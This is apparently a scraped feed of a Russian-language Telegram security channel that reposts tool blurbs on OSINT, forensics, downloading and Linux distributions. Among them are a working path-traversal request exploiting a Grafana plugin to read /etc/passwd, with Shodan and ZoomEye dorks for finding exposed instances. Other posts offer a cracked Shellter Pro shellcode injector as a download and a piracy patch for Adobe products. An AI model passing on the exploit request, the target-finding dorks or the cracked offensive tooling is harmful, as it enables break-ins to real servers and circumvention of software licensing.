C.I.T. Security
8.29K subscribers
2.93K photos
268 videos
4.22K files
4.22K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.me/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Nanobrok
[https://github.com/P0cL4bs/Nanobrok]

веб-сервис с открытым исходным кодом для удаленного управления и защиты вашего android устройства, написанный на Python. Позволяет организовать стабильное и безопасное соединение с вашим android устройством для защиты и удаленного контроля.

• может быть установлен на локальном хосте или на VPS
• осуществляет мониторинг активности с устройства
• строит карты местоположения вашего устройства
• флаг оповещения (в случае потери или кражи)
• удаленное включение микрофона
• удаленная передача файлов (для PRO)
• сетевой сканер показывает все сетевые устройства даже удаленно (для PRO)
• позволяет установить/получить текущий текст буфера обмена удаленно или даже заблокировать устройство
• android-клиент - https://play.google.com/store/apps/details?id=com.mh4x0f.nanobrok
Набор утилит для анализа Cobalt Strike beacon

Злоумышленники зачастую используют Cobalt Strike для эксплуатации и постэксплуатации. В качестве полезной нагрузки используется «маяк» (beacon). Маяк устанавливается на целевую машину, обеспечивает устойчивый удаленный доступ к скомпрометированным устройствам и большую часть времени находится в состоянии сна. В связи с этим его очень непросто обнаружить. Связь между скомпрометированной машиной и злоумышленником (сервером Cobalt Strike (C2)) шифруется с помощью ключа AES. Этот ключ можно использовать для расшифровки метаданных и трафика, который создается полезной нагрузкой. Данные инструменты позволяют детектировать активность злоумышленника с помощью анализа конфигурации маяка, дешифровки метаданных и трафика, а также извлечения ключей из памяти процесса (https://docs.microsoft.com/en-us/sysinternals/downloads/procdump).

1768.py [https://blog.didierstevens.com/2021/11/21/update-1768-py-version-0-0-10/] -
cs-decrypt-metadata.py [https://blog.didierstevens.com/2021/11/12/update-cs-decrypt-metadata-py-version-0-0-2/]
cs-parse-http-traffic.py [https://github.com/DidierStevens/Beta/blob/master/cs-parse-http-traffic.py]
cs-analyze-processdump.py [https://blog.didierstevens.com/2021/11/25/new-tool-cs-analyze-processdump-py/]
cs-extract-key.py [https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/]

Конкретный пример использования инструментов можно увидеть здесь - https://www.youtube.com/watch?v=VkRQTRtwJW8

#network #forensic #python
Вниманию пользователей клиентов старых версий (с призраком), не имеющих доступа к СИМ-картам!

В связи с переходом на новый формат хранения данных, в настоящее время Telegram не позволяет входить в аккаунт в старых приложениях. Сессии, созданные ранее, пока работают, но мы рекомендуем как можно скорее выполнить вход в приложениях последних версий, во избежание одномоментного закрытия текущих сессий на старых клиентах. В этом случае вы потеряете доступ в аккаунты на виртуальных номерах.
👍1
Forensically — комплексный инструмент проверки фотографий на предмет изменений.

Определить следы фотошопа или иного графического редактора? Посмотреть и изменить метаданные? Проанализировать фотку вплоть до каждого пикселя? Да легко.

Напомнил FotoForencis, который сейчас работает только с VPN/SOCKS или через Tor. Правда, функционал посерьезней.

#сайт #сервис
👍1
Forwarded from Portablik
GenP - универсальный патч для активации абсолютно всех продуктов Adobe.
❗️Инструкция по активации

ОБ ЭТОЙ ВЕРСИИ
📁 Категория: #Прочее
🆚 Версия: v2.7
🖥 ОС: Windows
📀 Разрядность: x86/x64
🇷🇺 Язык интерфейса: Английский
🔑 Лечение: Не требуется
#️⃣ #GenP @portablik
👍1
JDownloader 2.0 — софт для скачивания контента с 3784 сайтов, включая популярные файлообменники, соц.сети и многое другое.

Разумеется, YouTube, VK и все, кто прячет прямые ссылки на скачивание есть в списке JDownloader. Там вообще есть все.

Как использовать для скачивания файлов с заблокированных сайтов через cеть Tor? (Windows)

1. Перейдите в Настройки, далее вкладка Менеджер соединений и нажмите на кнопку Добавить.

2. Замените тип на Socks5, в поле Хост/порт введите localhost и 9050:

3. Нажмите ОК для сохранения настроек и закрытия окна.

JDownloader ротирует соединения. Поэтому если вы скачиваете с заблокированного сайта, то снимите галочку с соединения Без прокси.

#софт #Tor
Vortimo - приложение для проведения онлайн расследований от основателя компании Paterva (подарившего миру Maltego) Рулофа Темминга. Поставляется в виде десктопного приложения и расширения для браузера, которое в реальном времени записывает всю вашу сессию в браузере, архивируя локально страницы и попутно анализируя контекст.

Используя регулярные выражения, отдельно выделяет все найденные контактные данные, такие как номера телефонов или адреса электронной почты для дальнейшего обогащения при помощи некоторых сервисов, вроде Dehashed, People, Riskiq (достаточно предварительно указать API-ключи). Парсит и тегирует другую информацию: ссылки, никнеймы и хэштеги.

Как и Maltego, позволяет строить графы по собранным данным, но, не поддерживает модульную систему, за счет которой можно было бы расширять базовую функциональность. Имеет несколько вариантов лицензии, каждая из которых отличается ограничениями на количество возможных проектов - поэтому все инструменты доступны сразу из коробки.
👍1
​​LockBox

LockBox — это дистрибутив GNU/Linux, производный от Debian, Ubuntu и elementary OS, специально разработан для хранения и управления криптовалютами.

Он включает в себя несколько усиленных изменений конфигурации в целях безопасности, строго ограничительную настройку брандмауэра, несколько приложений, предназначенных для резервного копирования данных, диспетчер паролей и браузер LibreWolf.

https://github.com/StratousLabs/LockBox

Сайт: https://www.thelbx.io/
=============
Если нашел интересный софт, поделись с сообществом: @FOSS_triangle_bot
​​Vircadia

Децентрализованная метавселенная с открытым исходным кодом, которая позволяет отдельным лицам и организациям развертывать свои собственные решения виртуального мира.

▫️Работает на настольных компьютерах и через VR
▫️Аватары в полный рост
▫️Сотни пользователей одновременно
▫️16 км³ мирового пространства на сервере
▫️Твой сервер — твои правила. Нет никаких запретов

https://github.com/vircadia

Сайт: https://vircadia.com/
=============
Если нашел интересный софт, поделись с сообществом: @FOSS_triangle_bot
​​📄 Несанкционированное чтение файлов в Grafana (0day)

Похоже, что новый 0day LFI в Grafana существует благодаря плагину grafana-clock-panel. Достаточно отправить GET запрос вида:

GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

Тем временем, найти Grafana можно с помощью дорка для ZoomEye:

app:"Grafana"

Или в Shodan:

Grafana

—————————

UPD:

Работает и через другие плагины в /public/plugins/*

#web #lfi #0day
Shellter Pro v.3.5, разблокированная версия

Shellter - это инструмент для динамического внедрения шелл-кода и первый из когда-либо созданных по-настоящему динамический PE-инфектор. Его можно использовать для внедрения шелл-кода в собственные приложения Windows (в настоящее время только 32-битные приложения). Шелл-код может быть вашим или созданным с помощью фреймворка, например Metasploit.

Как это работает
https://bit.ly/3pN32d4

Как пользоваться
https://bit.ly/3pKzahr

YouTube
https://bit.ly/3oCC7kE

# вредоносное ПО # инструменты
ShellterPro_v3.5.zip
456.4 KB
Shellter Pro v.3.5, unlocked version
Sitadel - Web Application #Security Scanner

Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features :

▫️ Frontend framework detection
▫️ Content Delivery Network detection
▫️ Define Risk Level to allow for scans
▫️ Plugin system
▫️ Docker image available to build and run

https://github.com/shenril/Sitadel
Kali Toolsсписок инструментов Kali Linux и подробные инструкции по их применению.

Искал описание команды "shred", а в итоге наткнулся на целую энциклопедию по Kali Linux. Список инструментов следующий:

— Сбор информации
Анализ уязвимостей
— Беспроводные атаки
— Веб приложения
Криминалистические инструменты
— Стресс-тестирование
— Инструменты эксплуатации
—Sniffing и Spoofing
— Атака на пароли
— Поддержка доступа
— Взлом оборудования
— Обратная инженерия
— Анонимность
— Инструменты по составлению отчётов
— Уязвимые среды и программы для тренировки
Шифрование данных и антикриминалистика

Все описано максимально подробно. Инструкции меня очень впечатлили. Если вы хотели изучить Kali Linux, но не знали с чего начать — это однозначно ваш шанс!

#сайт #сервис #взлом #анонимность
👍1